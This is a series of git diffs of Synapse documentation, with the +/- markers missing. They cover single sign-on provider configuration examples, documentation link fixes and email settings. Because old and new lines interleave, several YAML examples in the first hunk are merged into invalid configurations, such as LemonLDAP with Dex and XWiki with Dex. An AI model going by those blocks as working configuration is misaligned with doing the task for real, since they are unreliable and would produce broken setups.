- idp_id: keycloak
idp_name: "My KeyCloak server"
issuer: "https://127.0.0.1:8443/realms/{realm_name}"
client_id: "synapse"
client_secret: "copy secret generated from above"
scopes: ["openid", "profile"]
user_mapping_provider:
config:
localpart_template: "{{ user.preferred_username }}"
display_name_template: "{{ user.name }}"
backchannel_logout_enabled: true # Optional
email_template: "{{ user.email }}"
```
### Auth0
@@ -262,285 +205,43 @@ oidc_providers:
display_name_template: "{{ user.preferred_username|capitalize }}" # TO BE FILLED: If your users have names in Authentik and you want those in Synapse, this should be replaced with user.name|capitalize.
```
### LemonLDAP
### Dex
[LemonLDAP::NG][lemonldap] is an open-source IdP solution.
[Dex][dex-idp] is a simple, open-source OpenID Connect Provider.
Although it is designed to help build a full-blown provider with an
external database, it can be configured with static passwords in a config file.
1. Create an OpenID Connect Relying Party in LemonLDAP::NG
2. The parameters are:
- Client ID under the basic menu of the new Relying Parties (`Options > Basic >
Client ID`)
- Client secret (`Options > Basic > Client secret`)
- JWT Algorithm: RS256 within the security menu of the new Relying Parties
(`Options > Security > ID Token signature algorithm` and `Options > Security >
Access Token signature algorithm`)
- Scopes: OpenID, Email and Profile
- Allowed redirection addresses for login (`Options > Basic > Allowed
redirection addresses for login` ) :
`[synapse public baseurl]/_synapse/client/oidc/callback`
Follow the [Getting Started guide](https://dexidp.io/docs/getting-started/)
to install Dex.
Edit `examples/config-dev.yaml` config file from the Dex repo to add a client:
Synapse config:
```yaml
oidc_providers:
- idp_id: lemonldap
idp_name: lemonldap
discover: true
issuer: "https://auth.example.org/" # TO BE FILLED: replace with your domain
client_id: "your client id" # TO BE FILLED
client_secret: "your client secret" # TO BE FILLED
scopes:
- "openid"
- "profile"
- "email"
user_mapping_provider:
config:
localpart_template: "{{ user.preferred_username }}}"
# TO BE FILLED: If your users have names in LemonLDAP::NG and you want those in Synapse, this should be replaced with user.name|capitalize or any valid filter.
display_name_template: "{{ user.preferred_username|capitalize }}"
staticClients:
- id: synapse
secret: secret
redirectURIs:
- '[synapse public baseurl]/_synapse/client/oidc/callback'
name: 'Synapse'
```
### GitHub
[GitHub][github-idp] is a bit special as it is not an OpenID Connect compliant provider, but
just a regular OAuth2 provider.
The [`/user` API endpoint](https://developer.github.com/v3/users/#get-the-authenticated-user)
can be used to retrieve information on the authenticated user. As the Synapse
login mechanism needs an attribute to uniquely identify users, and that endpoint
does not return a `sub` property, an alternative `subject_claim` has to be set.
1. Create a new OAuth application: [https://github.com/settings/applications/new](https://github.com/settings/applications/new).
2. Set the callback URL to `[synapse public baseurl]/_synapse/client/oidc/callback`.
Run with `dex serve examples/config-dev.yaml`.
Synapse config:
```yaml
oidc_providers:
- idp_id: github
idp_name: Github
idp_brand: "github" # optional: styling hint for clients
discover: false
issuer: "https://github.com/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
authorization_endpoint: "https://github.com/login/oauth/authorize"
token_endpoint: "https://github.com/login/oauth/access_token"
userinfo_endpoint: "https://api.github.com/user"
scopes: ["read:user"]
user_mapping_provider:
config:
subject_claim: "id"
localpart_template: "{{ user.login }}"
display_name_template: "{{ user.name }}"
```
### Google
[Google][google-idp] is an OpenID certified authentication and authorisation provider.
1. Set up a project in the Google API Console (see
[documentation](https://developers.google.com/identity/protocols/oauth2/openid-connect#appsetup)).
2. Add an "OAuth Client ID" for a Web Application under "Credentials".
3. Copy the Client ID and Client Secret, and add the following to your synapse config:
```yaml
oidc_providers:
- idp_id: google
idp_name: Google
idp_brand: "google" # optional: styling hint for clients
issuer: "https://accounts.google.com/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
scopes: ["openid", "profile", "email"] # email is optional, read below
user_mapping_provider:
config:
localpart_template: "{{ user.given_name|lower }}"
display_name_template: "{{ user.name }}"
email_template: "{{ user.email }}" # needs "email" in scopes above
```
4. Back in the Google console, add this Authorized redirect URI: `[synapse
public baseurl]/_synapse/client/oidc/callback`.
### Twitch
1. Set up a developer account on [Twitch](https://dev.twitch.tv/)
2. Obtain the OAuth 2.0 credentials by [creating an app](https://dev.twitch.tv/console/apps/)
3. Add this OAuth Redirect URL: `[synapse public baseurl]/_synapse/client/oidc/callback`
Synapse config:
```yaml
oidc_providers:
- idp_id: twitch
idp_name: Twitch
issuer: "https://id.twitch.tv/oauth2/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
client_auth_method: "client_secret_post"
user_mapping_provider:
config:
localpart_template: "{{ user.preferred_username }}"
display_name_template: "{{ user.name }}"
```
### GitLab
1. Create a [new application](https://gitlab.com/profile/applications).
2. Add the `read_user` and `openid` scopes.
3. Add this Callback URL: `[synapse public baseurl]/_synapse/client/oidc/callback`
Synapse config:
```yaml
oidc_providers:
- idp_id: gitlab
idp_name: Gitlab
idp_brand: "gitlab" # optional: styling hint for clients
issuer: "https://gitlab.com/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
client_auth_method: "client_secret_post"
scopes: ["openid", "read_user"]
user_profile_method: "userinfo_endpoint"
user_mapping_provider:
config:
localpart_template: '{{ user.nickname }}'
display_name_template: '{{ user.name }}'
```
### Facebook
0. You will need a Facebook developer account. You can register for one
[here](https://developers.facebook.com/async/registration/).
1. On the [apps](https://developers.facebook.com/apps/) page of the developer
console, "Create App", and choose "Build Connected Experiences".
2. Once the app is created, add "Facebook Login" and choose "Web". You don't
need to go through the whole form here.
3. In the left-hand menu, open "Products"/"Facebook Login"/"Settings".
* Add `[synapse public baseurl]/_synapse/client/oidc/callback` as an OAuth Redirect
URL.
4. In the left-hand menu, open "Settings/Basic". Here you can copy the "App ID"
and "App Secret" for use below.
Synapse config:
```yaml
- idp_id: facebook
idp_name: Facebook
idp_brand: "facebook" # optional: styling hint for clients
discover: false
issuer: "https://www.facebook.com"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
scopes: ["openid", "email"]
authorization_endpoint: "https://facebook.com/dialog/oauth"
token_endpoint: "https://graph.facebook.com/v9.0/oauth/access_token"
jwks_uri: "https://www.facebook.com/.well-known/oauth/openid/jwks/"
user_mapping_provider:
config:
display_name_template: "{{ user.name }}"
email_template: "{{ user.email }}"
```
Relevant documents:
* [Manually Build a Login Flow](https://developers.facebook.com/docs/facebook-login/manually-build-a-login-flow)
* [Using Facebook's Graph API](https://developers.facebook.com/docs/graph-api/using-graph-api/)
* [Reference to the User endpoint](https://developers.facebook.com/docs/graph-api/reference/user)
Facebook do have an [OIDC discovery endpoint](https://www.facebook.com/.well-known/openid-configuration),
but it has a `response_types_supported` which excludes "code" (which we rely on, and
is even mentioned in their [documentation](https://developers.facebook.com/docs/facebook-login/manually-build-a-login-flow#login)),
so we have to disable discovery and configure the URIs manually.
### Gitea
Gitea is, like GitHub, not an OpenID provider, but just an OAuth2 provider.
The [`/user` API endpoint](https://try.gitea.io/api/swagger#/user/userGetCurrent)
can be used to retrieve information on the authenticated user. As the Synapse
login mechanism needs an attribute to uniquely identify users, and that endpoint
does not return a `sub` property, an alternative `subject_claim` has to be set.
1. Create a new application.
2. Add this Callback URL: `[synapse public baseurl]/_synapse/client/oidc/callback`
Synapse config:
```yaml
oidc_providers:
- idp_id: gitea
idp_name: Gitea
discover: false
issuer: "https://your-gitea.com/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
client_auth_method: client_secret_post
scopes: [] # Gitea doesn't support Scopes
authorization_endpoint: "https://your-gitea.com/login/oauth/authorize"
token_endpoint: "https://your-gitea.com/login/oauth/access_token"
userinfo_endpoint: "https://your-gitea.com/api/v1/user"
user_mapping_provider:
config:
subject_claim: "id"
localpart_template: "{{ user.login }}"
display_name_template: "{{ user.full_name }}"
```
### XWiki
Install [OpenID Connect Provider](https://extensions.xwiki.org/xwiki/bin/view/Extension/OpenID%20Connect/OpenID%20Connect%20Provider/) extension in your [XWiki](https://www.xwiki.org) instance.
Synapse config:
```yaml
oidc_providers:
- idp_id: xwiki
idp_name: "XWiki"
issuer: "https://myxwikihost/xwiki/oidc/"
client_id: "your-client-id" # TO BE FILLED
client_auth_method: none
- idp_id: dex
idp_name: "My Dex server"
skip_verification: true # This is needed as Dex is served on an insecure endpoint
issuer: "http://127.0.0.1:5556/dex"
client_id: "synapse"
client_secret: "secret"
scopes: ["openid", "profile"]
user_profile_method: "userinfo_endpoint"
user_mapping_provider:
config:
localpart_template: "{{ user.preferred_username }}"
display_name_template: "{{ user.name }}"
```
### Apple
Configuring "Sign in with Apple" (SiWA) requires an Apple Developer account.
You will need to create a new "Services ID" for SiWA, and create and download a
private key with "SiWA" enabled.
As well as the private key file, you will need:
* Client ID: the "identifier" you gave the "Services ID"
* Team ID: a 10-character ID associated with your developer account.
* Key ID: the 10-character identifier for the key.
[Apple's developer documentation](https://help.apple.com/developer-account/?lang=en#/dev77c875b7e)
has more information on setting up SiWA.
The synapse config will look like this:
```yaml
- idp_id: apple
idp_name: Apple
issuer: "https://appleid.apple.com"
client_id: "your-client-id" # Set to the "identifier" for your "ServicesID"
client_auth_method: "client_secret_post"
client_secret_jwt_key:
key_file: "/path/to/AuthKey_KEYIDCODE.p8" # point to your key file
jwt_header:
alg: ES256
kid: "KEYIDCODE" # Set to the 10-char Key ID
jwt_payload:
iss: TEAMIDCODE # Set to the 10-char Team ID
scopes: ["name", "email", "openid"]
authorization_endpoint: https://appleid.apple.com/auth/authorize?response_mode=form_post
user_mapping_provider:
config:
email_template: "{{ user.email }}"
localpart_template: "{{ user.name }}"
display_name_template: "{{ user.name|capitalize }}"
```
### Django OAuth Toolkit
@@ -591,6 +292,263 @@ oidc_providers:
email_template: "{{ user.email }}"
```
### Facebook
0. You will need a Facebook developer account. You can register for one
[here](https://developers.facebook.com/async/registration/).
1. On the [apps](https://developers.facebook.com/apps/) page of the developer
console, "Create App", and choose "Build Connected Experiences".
2. Once the app is created, add "Facebook Login" and choose "Web". You don't
need to go through the whole form here.
3. In the left-hand menu, open "Products"/"Facebook Login"/"Settings".
* Add `[synapse public baseurl]/_synapse/client/oidc/callback` as an OAuth Redirect
URL.
4. In the left-hand menu, open "Settings/Basic". Here you can copy the "App ID"
and "App Secret" for use below.
Synapse config:
```yaml
- idp_id: facebook
idp_name: Facebook
idp_brand: "facebook" # optional: styling hint for clients
discover: false
issuer: "https://www.facebook.com"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
scopes: ["openid", "email"]
authorization_endpoint: "https://facebook.com/dialog/oauth"
token_endpoint: "https://graph.facebook.com/v9.0/oauth/access_token"
jwks_uri: "https://www.facebook.com/.well-known/oauth/openid/jwks/"
user_mapping_provider:
config:
display_name_template: "{{ user.name }}"
email_template: "{{ user.email }}"
```
Relevant documents:
* [Manually Build a Login Flow](https://developers.facebook.com/docs/facebook-login/manually-build-a-login-flow)
* [Using Facebook's Graph API](https://developers.facebook.com/docs/graph-api/using-graph-api/)
* [Reference to the User endpoint](https://developers.facebook.com/docs/graph-api/reference/user)
Facebook do have an [OIDC discovery endpoint](https://www.facebook.com/.well-known/openid-configuration),
but it has a `response_types_supported` which excludes "code" (which we rely on, and
is even mentioned in their [documentation](https://developers.facebook.com/docs/facebook-login/manually-build-a-login-flow#login)),
so we have to disable discovery and configure the URIs manually.
### GitHub
[GitHub][github-idp] is a bit special as it is not an OpenID Connect compliant provider, but
just a regular OAuth2 provider.
The [`/user` API endpoint](https://developer.github.com/v3/users/#get-the-authenticated-user)
can be used to retrieve information on the authenticated user. As the Synapse
login mechanism needs an attribute to uniquely identify users, and that endpoint
does not return a `sub` property, an alternative `subject_claim` has to be set.
1. Create a new OAuth application: [https://github.com/settings/applications/new](https://github.com/settings/applications/new).
2. Set the callback URL to `[synapse public baseurl]/_synapse/client/oidc/callback`.
Synapse config:
```yaml
oidc_providers:
- idp_id: github
idp_name: Github
idp_brand: "github" # optional: styling hint for clients
discover: false
issuer: "https://github.com/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
authorization_endpoint: "https://github.com/login/oauth/authorize"
token_endpoint: "https://github.com/login/oauth/access_token"
userinfo_endpoint: "https://api.github.com/user"
scopes: ["read:user"]
user_mapping_provider:
config:
subject_claim: "id"
localpart_template: "{{ user.login }}"
display_name_template: "{{ user.name }}"
```
### GitLab
1. Create a [new application](https://gitlab.com/profile/applications).
2. Add the `read_user` and `openid` scopes.
3. Add this Callback URL: `[synapse public baseurl]/_synapse/client/oidc/callback`
Synapse config:
```yaml
oidc_providers:
- idp_id: gitlab
idp_name: Gitlab
idp_brand: "gitlab" # optional: styling hint for clients
issuer: "https://gitlab.com/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
client_auth_method: "client_secret_post"
scopes: ["openid", "read_user"]
user_profile_method: "userinfo_endpoint"
user_mapping_provider:
config:
localpart_template: '{{ user.nickname }}'
display_name_template: '{{ user.name }}'
```
### Gitea
Gitea is, like GitHub, not an OpenID provider, but just an OAuth2 provider.
The [`/user` API endpoint](https://try.gitea.io/api/swagger#/user/userGetCurrent)
can be used to retrieve information on the authenticated user. As the Synapse
login mechanism needs an attribute to uniquely identify users, and that endpoint
does not return a `sub` property, an alternative `subject_claim` has to be set.
1. Create a new application.
2. Add this Callback URL: `[synapse public baseurl]/_synapse/client/oidc/callback`
Synapse config:
```yaml
oidc_providers:
- idp_id: gitea
idp_name: Gitea
discover: false
issuer: "https://your-gitea.com/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
client_auth_method: client_secret_post
scopes: [] # Gitea doesn't support Scopes
authorization_endpoint: "https://your-gitea.com/login/oauth/authorize"
token_endpoint: "https://your-gitea.com/login/oauth/access_token"
userinfo_endpoint: "https://your-gitea.com/api/v1/user"
user_mapping_provider:
config:
subject_claim: "id"
localpart_template: "{{ user.login }}"
display_name_template: "{{ user.full_name }}"
```
### Google
[Google][google-idp] is an OpenID certified authentication and authorisation provider.
1. Set up a project in the Google API Console (see
[documentation](https://developers.google.com/identity/protocols/oauth2/openid-connect#appsetup)).
2. Add an "OAuth Client ID" for a Web Application under "Credentials".
3. Copy the Client ID and Client Secret, and add the following to your synapse config:
```yaml
oidc_providers:
- idp_id: google
idp_name: Google
idp_brand: "google" # optional: styling hint for clients
issuer: "https://accounts.google.com/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
scopes: ["openid", "profile", "email"] # email is optional, read below
user_mapping_provider:
config:
localpart_template: "{{ user.given_name|lower }}"
display_name_template: "{{ user.name }}"
email_template: "{{ user.email }}" # needs "email" in scopes above
```
4. Back in the Google console, add this Authorized redirect URI: `[synapse
public baseurl]/_synapse/client/oidc/callback`.
### Keycloak
[Keycloak][keycloak-idp] is an open-source IdP maintained by Red Hat.
Keycloak supports OIDC Back-Channel Logout, which sends logout notifications to Synapse, so that Synapse users get logged out when they log out from Keycloak.
This can be optionally enabled by setting `backchannel_logout_enabled` to `true` in the Synapse configuration, and by setting the "Backchannel Logout URL" in Keycloak.
Follow the [Getting Started Guide](https://www.keycloak.org/guides) to install Keycloak and set up a realm.
1. Click `Clients` in the sidebar and click `Create`
2. Fill in the fields as below:
| Field | Value |
|-----------|-----------|
| Client ID | `synapse` |
| Client Protocol | `openid-connect` |
3. Click `Save`
4. Fill in the fields as below:
| Field | Value |
|-----------|-----------|
| Client ID | `synapse` |
| Enabled | `On` |
| Client Protocol | `openid-connect` |
| Access Type | `confidential` |
| Valid Redirect URIs | `[synapse public baseurl]/_synapse/client/oidc/callback` |
| Backchannel Logout URL (optional) | `[synapse public baseurl]/_synapse/client/oidc/backchannel_logout` |
| Backchannel Logout Session Required (optional) | `On` |
5. Click `Save`
6. On the Credentials tab, update the fields:
| Field | Value |
|-------|-------|
| Client Authenticator | `Client ID and Secret` |
7. Click `Regenerate Secret`
8. Copy Secret
```yaml
oidc_providers:
- idp_id: keycloak
idp_name: "My KeyCloak server"
issuer: "https://127.0.0.1:8443/realms/{realm_name}"
client_id: "synapse"
client_secret: "copy secret generated from above"
scopes: ["openid", "profile"]
user_mapping_provider:
config:
localpart_template: "{{ user.preferred_username }}"
display_name_template: "{{ user.name }}"
backchannel_logout_enabled: true # Optional
```
### LemonLDAP
[LemonLDAP::NG][lemonldap] is an open-source IdP solution.
1. Create an OpenID Connect Relying Party in LemonLDAP::NG
2. The parameters are:
- Client ID under the basic menu of the new Relying Parties (`Options > Basic >
Client ID`)
- Client secret (`Options > Basic > Client secret`)
- JWT Algorithm: RS256 within the security menu of the new Relying Parties
(`Options > Security > ID Token signature algorithm` and `Options > Security >
Access Token signature algorithm`)
- Scopes: OpenID, Email and Profile
- Allowed redirection addresses for login (`Options > Basic > Allowed
redirection addresses for login` ) :
`[synapse public baseurl]/_synapse/client/oidc/callback`
Synapse config:
```yaml
oidc_providers:
- idp_id: lemonldap
idp_name: lemonldap
discover: true
issuer: "https://auth.example.org/" # TO BE FILLED: replace with your domain
client_id: "your client id" # TO BE FILLED
client_secret: "your client secret" # TO BE FILLED
scopes:
- "openid"
- "profile"
- "email"
user_mapping_provider:
config:
localpart_template: "{{ user.preferred_username }}}"
# TO BE FILLED: If your users have names in LemonLDAP::NG and you want those in Synapse, this should be replaced with user.name|capitalize or any valid filter.
display_name_template: "{{ user.preferred_username|capitalize }}"
```
### Mastodon
[Mastodon](https://docs.joinmastodon.org/) instances provide an [OAuth API](https://docs.joinmastodon.org/spec/oauth/), allowing those instances to be used as a single sign-on provider for Synapse.
@@ -631,3 +589,81 @@ oidc_providers:
```
Note that the fields `client_id` and `client_secret` are taken from the curl response above.
### Twitch
1. Set up a developer account on [Twitch](https://dev.twitch.tv/)
2. Obtain the OAuth 2.0 credentials by [creating an app](https://dev.twitch.tv/console/apps/)
3. Add this OAuth Redirect URL: `[synapse public baseurl]/_synapse/client/oidc/callback`
Synapse config:
```yaml
oidc_providers:
- idp_id: twitch
idp_name: Twitch
issuer: "https://id.twitch.tv/oauth2/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
client_auth_method: "client_secret_post"
user_mapping_provider:
config:
localpart_template: "{{ user.preferred_username }}"
display_name_template: "{{ user.name }}"
```
### Twitter
*Using Twitter as an identity provider requires using Synapse 1.75.0 or later.*
1. Set up a developer account on [Twitter](https://developer.twitter.com/en/portal/dashboard)
2. Create a project & app.
3. Enable user authentication and under "Type of App" choose "Web App, Automated App or Bot".
4. Under "App info" set the callback URL to `[synapse public baseurl]/_synapse/client/oidc/callback`.
5. Obtain the OAuth 2.0 credentials under the "Keys and tokens" tab, copy the "OAuth 2.0 Client ID and Client Secret"
Synapse config:
```yaml
oidc_providers:
- idp_id: twitter
idp_name: Twitter
idp_brand: "twitter" # optional: styling hint for clients
discover: false # Twitter is not OpenID compliant.
issuer: "https://twitter.com/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
pkce_method: "always"
# offline.access provides refresh tokens; tweet.read and users.read are needed for the userinfo request.
scopes: ["offline.access", "tweet.read", "users.read"]
authorization_endpoint: https://twitter.com/i/oauth2/authorize
token_endpoint: https://api.twitter.com/2/oauth2/token
userinfo_endpoint: https://api.twitter.com/2/users/me?user.fields=profile_image_url
user_mapping_provider:
config:
subject_template: "{{ user.data.id }}"
localpart_template: "{{ user.data.username }}"
display_name_template: "{{ user.data.name }}"
picture_template: "{{ user.data.profile_image_url }}"
```
### XWiki
Install [OpenID Connect Provider](https://extensions.xwiki.org/xwiki/bin/view/Extension/OpenID%20Connect/OpenID%20Connect%20Provider/) extension in your [XWiki](https://www.xwiki.org) instance.
Synapse config:
```yaml
oidc_providers:
- idp_id: xwiki
idp_name: "XWiki"
issuer: "https://myxwikihost/xwiki/oidc/"
client_id: "your-client-id" # TO BE FILLED
client_auth_method: none
scopes: ["openid", "profile"]
user_profile_method: "userinfo_endpoint"
user_mapping_provider:
config:
localpart_template: "{{ user.preferred_username }}"
display_name_template: "{{ user.name }}"
```

@@ -16,7 +16,7 @@ connect to a postgres database.
- For other pre-built packages, please consult the documentation from
the relevant package.
- If you installed synapse [in a
virtualenv](setup/installation.md#installing-from-source), you can install
virtualenv](setup/installation.md#installing-as-a-python-module-from-pypi), you can install
the library with:
~/synapse/env/bin/pip install "matrix-synapse[postgres]"

@@ -46,7 +46,7 @@ when using a containerized Synapse, as that will prevent it from responding
to proxied traffic.)
Optionally, you can also set
[`request_id_header`](../usage/configuration/config_documentation.md#listeners)
[`request_id_header`](./usage/configuration/config_documentation.md#listeners)
so that the server extracts and re-uses the same request ID format that the
reverse proxy is using.

@@ -136,7 +136,7 @@ Unofficial packages are built for SLES 15 in the openSUSE:Backports:SLE-15 repository
#### ArchLinux
The quickest way to get up and running with ArchLinux is probably with the community package
<https://www.archlinux.org/packages/community/any/matrix-synapse/>, which should pull in most of
<https://archlinux.org/packages/community/x86_64/matrix-synapse/>, which should pull in most of
the necessary dependencies.
pip may be outdated (6.0.7-1 and needs to be upgraded to 6.0.8-1):
@@ -200,7 +200,7 @@ When following this route please make sure that the [Platform-specific prerequis
System requirements:
- POSIX-compliant system (tested on Linux & OS X)
- Python 3.7 or later, up to Python 3.10.
- Python 3.7 or later, up to Python 3.11.
- At least 1GB of free RAM if you want to join large public rooms like #matrix:matrix.org
If building on an uncommon architecture for which pre-built wheels are

@@ -120,7 +120,7 @@ specified in the config. It is located at
## SAML Mapping Providers
The SAML mapping provider can be customized by editing the
[`saml2_config.user_mapping_provider.module`](docs/usage/configuration/config_documentation.md#saml2_config)
[`saml2_config.user_mapping_provider.module`](usage/configuration/config_documentation.md#saml2_config)
config option.
`saml2_config.user_mapping_provider.config` allows you to provide custom

@@ -99,7 +99,7 @@ the ICU native dependency and its development headers
so that PyICU can build since no prebuilt wheels are available.
You can follow [the PyICU documentation](https://pypi.org/project/PyICU/) to do so,
and then do `pip install matrix-synapse[icu]` for a PyPI install.
and then do `pip install matrix-synapse[user-search]` for a PyPI install.
Docker images and Debian packages need nothing specific as they already
include or specify ICU as an explicit dependency.
@ -889,8 +889,8 @@ Any scripts still using the above APIs should be converted to use the
## User-interactive authentication fallback templates can now display errors
This may affect you if you make use of custom HTML templates for the
[reCAPTCHA](../synapse/res/templates/recaptcha.html) or
[terms](../synapse/res/templates/terms.html) fallback pages.
[reCAPTCHA (`synapse/res/templates/recaptcha.html`)](https://github.com/matrix-org/synapse/tree/develop/synapse/res/templates/recaptcha.html) or
[terms (`synapse/res/templates/terms.html`)](https://github.com/matrix-org/synapse/tree/develop/synapse/res/templates/terms.html) fallback pages.
The template is now provided an `error` variable if the authentication
process failed. See the default templates linked above for an example.
@ -1488,7 +1488,7 @@ New templates (`sso_auth_confirm.html`, `sso_auth_success.html`, and
is configured to use SSO and a custom
`sso_redirect_confirm_template_dir` configuration then these templates
will need to be copied from
[synapse/res/templates](synapse/res/templates) into that directory.
[`synapse/res/templates`](https://github.com/matrix-org/synapse/tree/develop/synapse/res/templates) into that directory.
## Synapse SSO Plugins Method Deprecation


@ -7,7 +7,7 @@ server admin. (Note that a server admin is distinct from a room admin.)
An existing user can be marked as a server admin by updating the database directly.
Check your [database settings](config_documentation.md#database) in the configuration file, connect to the correct database using either `psql [database name]` (if using PostgreSQL) or `sqlite3 path/to/your/database.db` (if using SQLite) and elevate the user `@foo:bar.com` to administrator.
Check your [database settings](../../configuration/config_documentation.md#database) in the configuration file, connect to the correct database using either `psql [database name]` (if using PostgreSQL) or `sqlite3 path/to/your/database.db` (if using SQLite) and elevate the user `@foo:bar.com` to administrator.
```sql
UPDATE users SET admin = 1 WHERE name = '@foo:bar.com';
```
@ -32,10 +32,10 @@ curl --header "Authorization: Bearer <access_token>" <the_rest_of_your_API_reque
```
For example, suppose we want to
[query the account](user_admin_api.md#query-user-account) of the user
[query the account](../../../admin_api/user_admin_api.md#query-user-account) of the user
`@foo:bar.com`. We need an admin access token (e.g.
`syt_AjfVef2_L33JNpafeif_0feKJfeaf0CQpoZk`), and we need to know which port
Synapse's [`client` listener](config_documentation.md#listeners) is listening
Synapse's [`client` listener](../../configuration/config_documentation.md#listeners) is listening
on (e.g. `8008`). Then we can use the following command to request the account
information from the Admin API.


@ -81,7 +81,7 @@ The following fields are returned in the JSON response body:
- `failure_ts` - nullable integer - The first time Synapse tried and failed to reach the
remote server, in ms. This is `null` if communication with the remote server has never failed.
- `last_successful_stream_ordering` - nullable integer - The stream ordering of the most
recent successfully-sent [PDU](understanding_synapse_through_grafana_graphs.md#federation)
recent successfully-sent [PDU](../understanding_synapse_through_grafana_graphs.md#federation)
to this destination, or `null` if this information has not been tracked yet.
- `next_token`: string representing a positive integer - Indication for pagination. See above.
- `total` - integer - Total number of destinations.
@ -174,7 +174,7 @@ The following fields are returned in the JSON response body:
Room objects contain the following fields:
- `room_id` - string - The ID of the room.
- `stream_ordering` - integer - The stream ordering of the most recent
successfully-sent [PDU](understanding_synapse_through_grafana_graphs.md#federation)
successfully-sent [PDU](../understanding_synapse_through_grafana_graphs.md#federation)
to this destination in this room.
- `next_token`: string representing a positive integer - Indication for pagination. See above.
- `total` - integer - Total number of destinations.


@ -6,7 +6,7 @@ registration requests, as proposed in
and stabilised in version 1.2 of the Matrix specification.
To use it, you will need to enable the `registration_requires_token` config
option, and authenticate by providing an `access_token` for a server admin:
see [Admin API](../admin_api).
see [Admin API](../admin_api/).
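A minimal sketch of the homeserver side of this (assuming registration itself is enabled):
```yaml
enable_registration: true
registration_requires_token: true  # require a registration token at signup
```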
## Registration token objects


@ -2,7 +2,7 @@
How do I become a server admin?
---
If your server already has an admin account you should use the [User Admin API](../../admin_api/user_admin_api.md#Change-whether-a-user-is-a-server-administrator-or-not) to promote other accounts to become admins.
If your server already has an admin account you should use the [User Admin API](../../admin_api/user_admin_api.md#change-whether-a-user-is-a-server-administrator-or-not) to promote other accounts to become admins.
If you don't have any admin accounts yet you won't be able to use the admin API, so you'll have to edit the database manually. Manually editing the database is generally not recommended so once you have an admin account: use the admin APIs to make further changes.
@ -115,7 +115,7 @@ something like the following in their logs:
2019-09-11 19:32:04,271 - synapse.federation.transport.server - 288 - WARNING - GET-11752 - authenticate_request failed: 401: Invalid signature for server <server> with key ed25519:a_EqML: Unable to verify signature for <server>
This is normally caused by a misconfiguration in your reverse-proxy. See [the reverse proxy docs](docs/reverse_proxy.md) and double-check that your settings are correct.
This is normally caused by a misconfiguration in your reverse-proxy. See [the reverse proxy docs](../../reverse_proxy.md) and double-check that your settings are correct.
Help!! Synapse is slow and eats all my RAM/CPU!


@ -78,4 +78,4 @@ If you would like to set up your own statistics collection server and send metri
consider using one of the following known implementations:
* [Matrix.org's Panopticon](https://github.com/matrix-org/panopticon)
* [Famedly's Barad-dûr](https://gitlab.com/famedly/company/devops/services/barad-dur)
* [Famedly's Barad-dûr](https://gitlab.com/famedly/infra/services/barad-dur)


@ -1,6 +1,6 @@
# Request log format
HTTP request logs are written by synapse (see [`site.py`](../synapse/http/site.py) for details).
HTTP request logs are written by synapse (see [`synapse/http/site.py`](https://github.com/matrix-org/synapse/tree/develop/synapse/http/site.py) for details).
See the following for how to decode the dense data available from the default logging configuration.


@ -569,6 +569,115 @@ Example configuration:
```yaml
delete_stale_devices_after: 1y
```
---
### `email`
Configuration for sending emails from Synapse.
Server admins can configure custom templates for email content. See
[here](../../templates.md) for more information.
This setting has the following sub-options:
* `smtp_host`: The hostname of the outgoing SMTP server to use. Defaults to 'localhost'.
* `smtp_port`: The port on the mail server for outgoing SMTP. Defaults to 465 if `force_tls` is true, else 25.
_Changed in Synapse 1.64.0:_ the default port is now aware of `force_tls`.
* `smtp_user` and `smtp_pass`: Username/password for authentication to the SMTP server. By default, no
authentication is attempted.
* `force_tls`: By default, Synapse connects over plain text and then optionally upgrades
to TLS via STARTTLS. If this option is set to true, TLS is used from the start (Implicit TLS),
and the option `require_transport_security` is ignored.
It is recommended to enable this if supported by your mail server.
_New in Synapse 1.64.0._
* `require_transport_security`: Set to true to require TLS transport security for SMTP.
By default, Synapse will connect over plain text, and will then switch to
TLS via STARTTLS *if the SMTP server supports it*. If this option is set,
Synapse will refuse to connect unless the server supports STARTTLS.
* `enable_tls`: By default, if the server supports TLS, it will be used, and the server
must present a certificate that is valid for 'smtp_host'. If this option
is set to false, TLS will not be used.
* `notif_from`: defines the "From" address to use when sending emails.
It must be set if email sending is enabled. The placeholder '%(app)s' will be replaced by the application name,
which is normally set in `app_name`, but may be overridden by the
Matrix client application. Note that the placeholder must be written '%(app)s', including the
trailing 's'.
* `app_name`: defines the default value for '%(app)s' in `notif_from` and email
subjects. It defaults to 'Matrix'.
* `enable_notifs`: Set to true to enable sending emails for messages that the user
has missed. Disabled by default.
* `notif_for_new_users`: Set to false to disable automatic subscription to email
notifications for new users. Enabled by default.
* `client_base_url`: Custom URL for client links within the email notifications. By default
links will be based on "https://matrix.to". (This setting used to be called `riot_base_url`;
the old name is still supported for backwards-compatibility but is now deprecated.)
* `validation_token_lifetime`: Configures the time that a validation email will expire after sending.
Defaults to 1h.
* `invite_client_location`: The web client location to direct users to during an invite. This is passed
to the identity server as the `org.matrix.web_client_location` key. Defaults
to unset, giving no guidance to the identity server.
* `subjects`: Subjects to use when sending emails from Synapse. The placeholder '%(app)s' will
be replaced with the value of the `app_name` setting, or by a value dictated by the Matrix client application.
In addition, each subject can use the following placeholders: '%(person)s', which will be replaced by the displayname
of the user(s) that sent the message(s), e.g. "Alice and Bob", and '%(room)s', which will be replaced by the name of the room the
message(s) have been sent to, e.g. "My super room". In addition, emails related to account administration will
can use the '%(server_name)s' placeholder, which will be replaced by the value of the
`server_name` setting in your Synapse configuration.
